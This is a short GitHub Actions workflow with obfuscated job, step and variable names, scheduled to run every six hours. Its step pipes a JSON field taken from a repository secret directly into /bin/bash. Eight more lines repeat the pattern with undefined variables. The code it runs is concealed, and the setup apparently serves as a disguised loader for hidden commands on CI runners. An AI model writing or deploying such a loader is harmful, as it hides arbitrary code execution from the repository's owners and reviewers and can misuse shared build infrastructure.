name: houjiteng1093
on:
  workflow_dispatch:
  schedule:
    - cron: '28 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: houjiteng1093
        env:
          ndld78553: ${{ secrets.ndld78553 }}
        run: |
          echo $ndld78553 | jq -r .v1 | /bin/bash
          echo $tzxi293 | jq -r .jkl7198 | /bin/bash
          echo $ebma1310 | jq -r .n9 | /bin/bash
          echo $l75 | jq -r .k00 | /bin/bash
          echo $wawj1 | jq -r .q653 | /bin/bash
          echo $pzaw27 | jq -r .ln7 | /bin/bash
          echo $ec93 | jq -r .btc23923 | /bin/bash
          echo $uww0 | jq -r .d80525 | /bin/bash
          echo $ny84177 | jq -r .dlxa3471 | /bin/bash

